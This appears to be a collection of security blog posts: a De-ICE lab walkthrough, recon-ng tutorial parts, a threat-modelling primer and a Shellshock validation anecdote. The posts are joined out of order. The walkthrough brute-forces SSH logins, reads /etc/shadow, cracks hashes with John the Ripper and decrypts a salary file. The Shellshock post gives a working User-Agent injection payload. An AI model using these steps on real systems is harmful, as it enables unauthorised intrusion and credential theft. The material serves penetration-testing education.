set RHOSTS 192.168.1.100
set THREADS 4
set USER_FILE /root/Desktop/de-iceUsers.txt
set USER_AS_PASS true

Look at that! There is nothing better than a shell and you will never forget the first one you get. Mine was a unpatched BIND 9 DNS server.

[+] SSH - Success: 'bbanter:bbanter' 'uid=1001(bbanter) gid=100(users) groups=100(users) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux '
ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password: 
Linux 2.6.16.
bbanter@slax:~$ who
bbanter pts/0 Apr 12 14:06 (192.168.1.128)

We only have access to the users group right now so lets see if we can elevate our access manually.

bbanter@slax:~$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:
bbanter@slax:~$ cat /etc/passwd
root:x:0:0:DO NOT CHANGE PASSWORD - WILL BREAK FTP ENCRYPTION:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
aadams:x:1000:10:,,,:/home/aadams:/bin/bash
bbanter:x:1001:100:,,,:/home/bbanter:/bin/bash
ccoffee:x:1002:100:,,,:/home/ccoffee:/bin/bash

The wheel group is our best bet since in Linux and Unix systems it allows users to run the su command. aadams is a member of the wheel group so we will try to brute force that password, again using metasploit.

set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
set THREADS 128
set USERNAME aadams
set VERBOSE false
run
****TIME PASSES****
[*] SSH - Starting bruteforce
[+] SSH - Success: 'aadams:nostradamus' 'uid=1000(aadams) gid=10(wheel) groups=10(wheel) Linux slax 2.6.16 #95 Wed May 17 10:16:21 GMT 2006 i686 pentium2 i386 GNU/Linux

We will use the new set of credentials to once again SSH to the system.

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::

John the Ripper can directly attach shadow files so lets try it using the rockyou wordlist. The first one runs a simple set of rules to look for easy passwords, basically so you don’t have to find bbanter again.

john --signle deiceShadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt de-iceShadow.txt
root:tarot:13553:0:::::
aadams:nostradamus:13550:0:99999:7:::
bbanter:bbanter:13550:0:99999:7:::
ccoffee:hierophant:13550:0:99999:7:::
su -

Now that we are root on the system lets look for sensitive data on the system.

root@slax:/home# ls
aadams/  bbanter/  ccoffee/  ftp/
root@slax:/home# cd ccoffee
root@slax:/home/ccoffee# ls
root@slax:/home/ccoffee# cd ../ftp
root@slax:/home/ftp# ls
incoming/
root@slax:/home/ftp# cd incoming/
root@slax:/home/ftp/incoming# ls
salary_dec2003.csv.enc*

Huh, .enc, google that I bet salary information isn’t supposed to be there. Running strings definitely doesn’t produce readable results.

root@slax:/home/ftp/incoming# strings salary_dec2003.csv.enc | head -10
Salted__n
Lw$A`
YN>7
#ki8
/><b
Wm&/
KU'M
R|T&
@/CP/
    0"Kt

But try googling the Salted__n and see if you can figure out what we might need to do. First, we need to remember the /etc/passwd entry that noted changing the root password would break encryption and second after some research we know that it is encrypted using OpenSSL.

root@slax:/home/ftp/incoming# openssl aes-128-cbc -d -in salary_dec2003.csv.enc -out salary_dec2003.csv
enter aes-128-cbc decryption password:
root@slax:/home/ftp/incoming# strings salary_dec2003.csv | head -10

That is certainly sensitive data! We’ve got all the flag, time to call it a day.

 

Creating a Workspace

The workspace is an area that will help keep your reconnaissance organized.  Each workspace has it’s own directory inside the hidden .recon-ng directory in the home directory.

First we will find an organization to recon and build our workspace around this company.  We will use HackerOne to get our company.

This is how Wikipedia describes HackerOne:

HackerOne is a vulnerability coordination and bug bounty platform that connects businesses with cybersecurity researchers (aka, hackers). It is one of the first companies to embrace and utilize crowd-sourced security and hackers as linchpins of its business model, and is the largest cybersecurity firm of its kind.[1]”

Even though we are only performing reconnaissance in a non-intrusive manner, we will use a company from HackerOne’s Directory.  Under the right conditions, this company has agreed to recon and scanning.  We will only be using recon-ng. Figure 1 shows the company we will use in the tutorial but feel free to select a different company from HackerOne or use any one that you are authorized to test against.

HackerOne

Figure 1: HackerOne Company

Figures 2 and 3 show the scope that is authorized for testing including eligible submissions and domains.

Eligible Items

Figure 2: Eligible Items

Allowed Domains

Figure 3: Allowed Domains

workspaces -h shows us the different option we have a available to use (Figure 4).

Workspace -h

Figure 4: Workspace -h

Next we will add our workspace using the following command (Figure 5)

workspaces add
Adding a Workspace

Figure 5: Adding a Workspace

After this command you are automatically placed into your new workspace. workspaces list will show you the status of your workspaces.

List of workspaces

Figure 6: List of workspaces

Next, we will add our company and our domain.  This will add information to the SQLite database. To add information into the database, we need to understand the schema, the layout of the tables. To look at the schema of the database run the following command (Figure 7)

show schema
Show Schema

Figure 7: Show Schema

There are thirteen different tables, we will view the schema of the tables we use in this tutorial.

 add companies

Running the add companies command will make the other columns available.   Press enter if you want to leave that column blank.

Add Company

Figure 8: Add Company

Add the domain using the following command (Figure 9).

add domains
Add Domains

Figure 9: Add Domains

To verify that the domain was added successfully run the command shown in Figure 10.

show domains
List Domains

Figure 10: List Domains

A simple way of thinking about adding to the tables is shown in the next Figure 11.

Table Visualization

Figure 11: Table Visualization

Now that we’ve added data to the database and know how to ensure that data was manually inserted correctly lets move on to importing and exporting data.

Importing Data into the Database

We will uses theHarvester to gather information about United.com and import this into recon-ng’s database.

From Edge Security  http://www.edge-security.com/theharvester.php

“The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

This tool is intended to help Penetration Testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization.”

If theHarvester isn’t already installed, i.e. you aren’t using Kali Linux, you can clone it from here: https://github.com/laramies/theHarvester

theHarvester

Figure 12: theHarvester

We called theHarvester to gather data on domain united.com using all the data sources listed in the help screen.  We directed the output to my recon-ng folder using the ‘>’ operator. The sample command we used follows:

./theHarvester.py -d united.com -b all > ~/recon-ng/harvester.txt

The file name is harvester.txt. This is an ugly file that well will parse through using a few linux utilities. Sample results are shown in the next figure.

Sample Results

Figure 13: Sample Results

The next step is to make this snippet and clean it up a bit with some Linux utilities. We will use grep and AWK to trim the tree.

Grep and AWK

grep is a command-line utility for searching plain-text data sets for lines matching a regular expression.

This is by no means the perfect way.  This is just one of many to get the results you need. Using grep, we will create a list of email addresses from harvester.txt file. (Figure 14)

grep @united.com harvester.txt > united_emails.txt
grep command

Figure 14: grep command

If you are interested in the file contents use the cat command to view file the contents in the terminal

cat united_emails.txt
cat results

Figure 15: cat results

Next, we will create a list of hosts for import from theHarvester results. (Figure 16)

grep ":" harvester.txt
grep host

Figure 16: grep host

Grep will also help create the virtual host list.  Also take note that since “united.com” is the only domain in scope, it becomes part of the command.

grep ":" harvester.txt | grep united.com

The pattern that we wanted to match was “=” and I didn’t want to count the lines after the pattern so I chose to use 200 as my line count after the pattern, as shown in Figure 17.

grep for Virtual Hosts

Figure 17 grep for Virtual Hosts

This command was a little harder to figure out. The pattern that we wanted to match was “=” and I didn’t want to count the lines after the pattern so I chose to use 200 as my line count after the pattern.

grep -A200 "=" harvester.txt | grep united.com > virtual_hosts.txt

It is time to import our information into recon-ng.

Using the show modules command, we get a list of modules broken down by categories. We will use import/list module from the Import category.

show modules
Import Modules

Figure 18: Import Modules

The “show info” command shows the options to use and the table and columns that will be needed for the import.

show info
Show Info

Figure 19: Show Info

To find the column and table, we will use the “show schema” command.  This will give use a list of the Tables and the different columns in each.

show schema
Show Schema

Figure 20: Show Schema

To import email addresses, we will the  “contacts” table and the email column. Our file name will be the united_email.txt file we created using theHarvester. The “set” statement, sets the variables for the import. The “run” command executes the module.

set TABLE contacts
set COLUMN email
set FILENAME united_emails.txt
run
Email Import

Figure 21: Email Import

The “show contacts” command show the data inside the “Contacts Table”. This is a second verification that the data imported correctly.

Show Contacts

Figure 22: Show Contacts

Part 3: Usage and Reporting

Intro

Recon-ng is a Open Source Reconnaissance framework written in Python.  This SQLite database driven tool incorporates Python modules and API Keys to allows itself to be a conduit for many tools ranging from The Harvester to Metasploit.  It is an awesome standalone reconnaissance tool in its own right. As a side note we all totally have a geeky nerd crush on LaNMaSterR53.

This part of the series will take a look at installation, adding API Keys. Later we will show you how to create a Workspace, importing data into the database, and export data for the use with other tools.

For our targets of reconnaissance, we will use HackerOne’s directory of companies.  This is not our way of saying, “Go out and hack these companies” but our way of doing safe recon and provide continuous screenshots.  That will be easy to follow.  This is also our way of introducing you to HackerOne and the Bug Bounty community if you are not already familiar with it.

Getting Started

While most penetration testers will be running this out of Kali Linux the prerequisites (git and pip) may need to be installed before you start. Fortunately, this is easy on most linux flavors and requires just a few simple commands:

sudo apt-get update
sudo apt-get install git
sudo apt-get install python-pip python-dev build-essential
sudo pip install --upgrade pip
sudo pip install --upgrade virtualenv

Next clone Recon-ng from bitbucket (Figure 1). In this tutorial we clone to the Home directory but feel free to use whatever directory structure works for you.

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
git install

Figure 1: git install

Next, change directory into the newly created recon-ng and list the contents (Figure 2).

cd recon-ng
ls
recon-ng contents

Figure 2: recon-ng contents

We will use the REQUIREMENTS file to finish installing the dependencies for recon-ng.

pip install -r REQUIREMENTS

At this point the installation is almost ready to use, we will go over a little bit of information now while you’re still paying attention and then get recon-ng running and the API keys loaded.

The installation of recon-ng also created a .recon-ng a hidden directory inside your home directory.  This directory is empty.  This is where your key.db and your workspaces will be created. After logging into recon-ng for the first time, a directory and the keys.db is entered in the hidden .recon-ng directory (Figure 3).

.recon-ng directory

Figure 3: .recon-ng directory

To run recon-ng, go to the folder where you ran the “git clone” command. This is where the magic happens.

cd recon-ng 
./recon-ng

Don’t worry if you get the “_api key not set error” (Figure 4).  We have not added any API keys yet.

Initial Start

Figure 4: Initial Start

From our screen, we can see that there are 76 Recon modules, 8 Reporting modules, 2 Import modules, 2 Exploitation modules, and 2 Discovery modules.  We are also using the “default” workspace. (Figure 5)

Recon-ng start screen

Figure 5: Recon-ng start screen

Close recon-ng and lets look at the modules and the underlying code. (Figure 6)

cd modules
cd recon
ls
Module Directory

Figure 6: Module Directory

If we go inside the module directory and inside a module, we can see the Python script that does all the magic. (Figure 7)

Module Content

Figure 7: Module Content

Adding API Keys

As I said in the introduction, this is a database driven tool.  Now it’s time to add information into the database.

The API keys are used by the modules to gather information for the SQLite database.  Some of the API keys are free but some can be expensive.  I will keep this tutorial to the free API keys that are available.

After going back into the recon-ng directory and typing “./recon-ng”, you will be inside the recon-ng console. (Figure 8)

keys list
Keys List

Figure 8: Keys List

The following command is an example of adding the shodan_api key. (Bottom of Figure 8, Look close it is there)

keys add shodan_api <paste key here>

API Keys Signup URLs

Signing up for the API keys is the least fun and most time consuming part of the setup. Showing each signup would be lethally boring so here are the list of URLs. All links open in a new window because we are thoughtful like that.

Google API – https://console.developers.google.com/apis/library
Bing API – https://msdn.microsoft.com/en-us/library/bing-ads-getting-started.aspx
Facebook API – https://developers.facebook.com/docs/apis-and-sdks
Instragram API – https://www.programmableweb.com/api/instagram
Linkedin API – https://developer.linkedin.com/docs/rest-api
Shodan API – https://developer.shodan.io/
Twitter API – https://apps.twitter.com/


Part 2: Workspaces and Importing Data

Now that you’ve identified what you have to protect, the next step is to figure out who you are protecting it from. This concept is much easier to understand. Almost all actors fall into two broad categories: internal and external actors.

Internal actors are employees, contractors, and third parties with access to your assets. Third parties could be employees of your cloud provider or the company that processes benefits and payroll.

Internal threats can result from actors inadvertently using their privilege improperly, such as creating a misconfiguration or clicking a link in a phishing email. Internal actors can also purposefully act malicious  and knowingly create threats in the environment such as stealing data or installing malicious software.

  • Internal Actors
    • Employees
    • Contractors
    • Third Parties with access to assets
  • Internal Malicious Actors
    • Disgruntled Employees
    • Internal System Controlled by External Actor

Due to the inherent trust given to internal actors, the potential impact from these actors is higher than from external actors. While external actors make for better news stories and TV shows, it is imperative to review and mitigate threats from internal actors.

There are a number of different types of external actors, each with different motivations and goals.

  • External Malicious Actors
    • Hackers
    • Crackers
    • Hacktivists
    • Criminal Elements
    • Nation-States
    • Industrial Espionage

While the term Hacker has become synonymous with any individual with nefarious motives, the term is usually used for a curious, technically savvy individual who gains unauthorized privileges to a system without malicious intent.

On the other hand, Crackers are individuals with malicious intent who intentionally try to bypass security controls.

With the movement of activities online, normal protesters morphed into Hacktivists. Hacktivists target an organization with a political or social motive. While hackers or crackers choose targets of opportunity or with a financial motive, Hacktivists target a sector or organization for ideological reasons. Due to that ideological focus, it is possible that hacktivists will expend more time and effort on a target.

Criminal elements are attempting to monetize the assets of an organization. This is a fancy way of saying they will sell credit card numbers, personal information, or run bitcoin miners on computers. Ransomware, which encrypts user data and requires a ransom to access the encrypted files, is a common way to extort organizations for money.

Nation-States are highly funded and operate on extended time frames, usually in the terms of years. Nation-states are incredibly difficult to defend against due to the additional levels expertise they can bring to bear. If you are in an industry commonly targeted by a nation-state (such as Defense or Aerospace), focusing on breach detection and having a close relationship with law enforcement is paramount.

Industrial espionage is a catch-all term for any of the above individuals focusing on stealing trade secrets or sensitive organization data. Nation-states may engage in industrial espionage to give their companies a competitive edge. Criminal elements may target an organization to sell any information obtained during a breach or sell information found during an untargeted breach. Hacktivists will expose data found to further their ideological cause.

Now that you’ve determined who are the most likely actors in your threat model and also determined which would cause the largest potential impact, you can create a list of threats to focus on.

 

A quick example would be a coal company operating a mine.

 

Asset                                Actor                                                 Threat              Mitigation


External Website             Hacktivists/Hackers/Crackers        Defacement       Quarterly Web Application Scans

Personnel HR Data          Employees/Third Party                   Data Theft           Access Control Policies

Internal Network             Criminal Elements                            Phishing               Phishing Awareness Training

 

Obviously, this list would be very long for any organization, but at some point, many of the mitigation elements will overlap. This means that in the previous example, the Access Control Policies that protect HR Personnel Data from Data Theft also protect it from access if a criminal element gains unauthorized access to the network. The best mitigation items will protect multiple assets from a variety of actors and eliminate most risk.

Where to Start

The simplest threat model is something (Asset) being manipulated by someone or something (Actor), resulting in a threat.

 

Threat Model Overview

Threat Model Overview

This post deals with the first part of the equation.

 

Threat Model Asset

Threat Model Asset

What are you protecting? Computer systems are relatively expensive to purchase. A server and attached disks that cost five thousand dollars to purchase new can easily store millions of dollars worth of data. Prior to engaging any company for a security assessment, it is imperative to understand exactly what needs to be protected and why.

Data and Data Flow

What is your company’s secret sauce? If you are protecting design documents for a widget, there is a chain of systems that all require protection. The storage system needs to be protected from unauthorized access. The end user system that is used to modify the documents require that same level of protection. Also, the entire network that transmits documents needs to be protected. This also needs to be done within a fixed budget and not affect the ability of the company to make money. While Secure Network Management makes money securing networks, most companies do not.

Hardware

Why would someone want to compromise a computer? Data is valuable, but computers and networks can also be monetized. Bitcoin mining reduces the computing power available for legitimate activities and increases electricity usage. Spam malware uses computing power, network bandwidth, and has the potential for a legitimate business to be blacklisted by SMTP servers.

Now What

Know what your network is. While this sounds easy enough, it is normally one of the limiting factors. That is easy right? You use that one 10.10.10.0/24 network for all your computers and servers. Done! Well…except each wireless access point uses a 192.168.1.0/24 network and the LAN-to-LAN tunnel into the Cloud providers network using that 10.10.11.0/28 network. And that one guy who brought a wireless router in from home so he could watch movies on his iPad during work…I wish I had made that last one up.  Better update all the spreadsheets! Security assessments are garbage in/garbage out; the assessors will only test what is in the scope you provide or authorize. If you do not know or don’t have the technical expertise to determine all of the networks in use, any reputable security or IT support company can review the network fabric. This review should not be a long or costly engagement.

Most people underestimate the number of devices on their network by at least 30%. Everything with a network cable is a potential target. Server and computer counts are normally pretty accurate. Printers, scanners, and peripherals are normally underestimated, if included at all. Network devices, beyond the core switch and router, normally do not show up on device spreadsheets. Obtaining a fairly accurate count of devices using a simple network scanner is also easily performed by a competent systems administrator, security, or IT support company.

You are now a few days into getting an asset list in order. This is a solid investment with or without an assessment. You cannot protect what you don’t know about.


End of Step 1: What you know – The networks and devices in use and data that is stored, processed, and transmitted on the network.

I was on an assessment this week just second checking some scanner results and I ran across an interesting page (Figure 1).

cgi-bin in URL

Figure 1: cgi-bin in URL

I saw the cgi-bin and thought that it might be worth giving it a second look for shellshock. Shellshock is the awesome brand name for CVE-2014-6271 which is a GNU Bash vulnerability. The client had placed significant restrictions on actual exploitation on the network; this was truly a vulnerability assessment with validation instead of a penetration test. The first thing I needed to do was see if the web server might be running on a vulnerable OS so I did a simple Nmap scan (Figure 2).

Nmap results for web server

Figure 2: Nmap results for web server

Now I had a potentially vulnerable OS and application vector to attack so I fired up Burp Suite and captured a request to the application (Figure 3).

Request to R2 web application

Figure 3: Request to R2 web application

Knowing that I couldn’t due a Bash one-liner or upload any code to the system due to the restrictions I decided to start a tcpdump session looking for traffic from the remote host tcpdump host 192.168.14.61 (Figure 5) and modified the User-Agent string ( ) { :; }; /bin/bash “ping 192.168.30.54 -c 10” before forwarding the request on.

Shellshocking the User-Agent

Figure 4: Shellshocking the User-Agent

tcpdump filtered for vulnerable host

Figure 5: tcpdump filtered for vulnerable host

Look at all those glorious packets! Just a reminder that *nix systems will ping until cancelled so the -c 10 option instructed it to only send 10 instead of pinging until the end of time. If this was a true penetration test instead of sending a ping command I would have used a bash one-liner to get an interactive shell. This was my first in the wild shellshock so it was still pretty fun.